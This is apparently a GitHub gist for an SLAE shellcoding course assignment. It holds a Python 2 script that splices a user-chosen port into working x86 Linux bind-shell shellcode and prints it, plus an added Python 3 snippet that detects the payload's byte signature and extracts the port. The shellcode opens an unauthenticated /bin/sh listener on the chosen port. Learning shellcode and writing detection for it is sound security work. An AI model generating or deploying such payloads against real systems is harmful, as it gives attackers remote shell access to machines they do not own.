@michaelnewton
Created May 25, 2017 08:05
SLAE Assignment #1 - Bind Shellcode Generator
#!/usr/bin/env python
# Python 2 script (print statements, raw_input).
# Cut the shellcode apart at the point of the port declaration for assembly later.
shellcodefront = r"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x92\x43\x56\x66\x68"
shellcodeback = r"\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x57\x52\x89\xe1\xcd\x80\xb0\x66\x43\x57\x52\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
while True:
    print "+------------------------------------+"
    print "| Bind Shellcode |"
    print "| SLAE Assignment #1 SLAE-895 |"
    print "| Generator Script 1.0 |"
    print "+------------------------------------+\n"
    portnum = raw_input("Enter the port number to bind to: ")
    if not 0 < int(portnum) <= 65535:  # A port must fit in 16 bits, or the slices below drop digits
        print "Invalid port chosen, port number " + portnum + " is outside 1-65535\n"
        continue
    port4x = format(int(portnum), '04x')  # Change the format of the input to hex bytes
    if port4x[0:2:] != "00":  # Validate the first byte of the port is not null
        if port4x[2:4:] != "00":  # Validate the second byte of the port is not null
            custom_port = "\\x" + port4x[0:2:] + "\\x" + port4x[2:4:]  # Format the bytes as per our shellcode format
            print "Port number to inject: " + custom_port + "\n"
            print "Here is your shellcode:\n"
            print shellcodefront + custom_port + shellcodeback + "\n"
            if int(portnum) < 1024:  # Check if port is lower than 1024 and issue a warning
                print "Remember you need to be root to open this port!\n\n"
            break
    # Reached only when one of the two port bytes is 0x00
    print "Invalid port chosen, port number " + portnum + " creates a NULL byte, try another port greater than " + portnum
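The splice point the script uses is also a stable signature for analysis: the port always sits, in network byte order, between the `\x66\x68` that ends `shellcodefront` and the `\x66\x53` that starts `shellcodeback`. The following Python 3 snippet is an added example, not part of the original gist; its function names and the sample buffer are constructed for illustration. It recovers the bind port from a captured byte buffer or from the `\xNN` text form the script prints.

```python
import re
import struct

# Bytes copied from the gist: tail of shellcodefront (push esi; push word imm16)
# and head of shellcodeback (push bx; mov ecx, esp; push 0x10).
PREFIX = b"\x56\x66\x68"
SUFFIX = b"\x66\x53\x89\xe1\x6a\x10"
PORT_RE = re.compile(re.escape(PREFIX) + b"(..)" + re.escape(SUFFIX), re.DOTALL)


def decode_escaped(text):
    """Turn the printed '\\x6a\\x66...' text form into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def extract_bind_ports(buf):
    """Return every port embedded at the splice point, as integers."""
    if isinstance(buf, str):
        buf = decode_escaped(buf)
    # The two captured bytes are the big-endian (network order) port.
    return [struct.unpack(">H", m.group(1))[0] for m in PORT_RE.finditer(buf)]


def null_free(port):
    """True when neither byte of the 16-bit port is 0x00 (the script's constraint)."""
    return 0 < port <= 0xFFFF and all(struct.pack(">H", port))


# Constructed sample: filler bytes around the signature with port 4444 (0x115c).
SAMPLE = b"AAAA" + PREFIX + struct.pack(">H", 4444) + SUFFIX + b"BBBB"

if __name__ == "__main__":
    print(extract_bind_ports(SAMPLE))
    print(null_free(4444), null_free(256), null_free(80))
```

Because the generator rejects any port with a `0x00` byte, ports below 256 and exact multiples of 256 never appear in its output, which `null_free` reproduces.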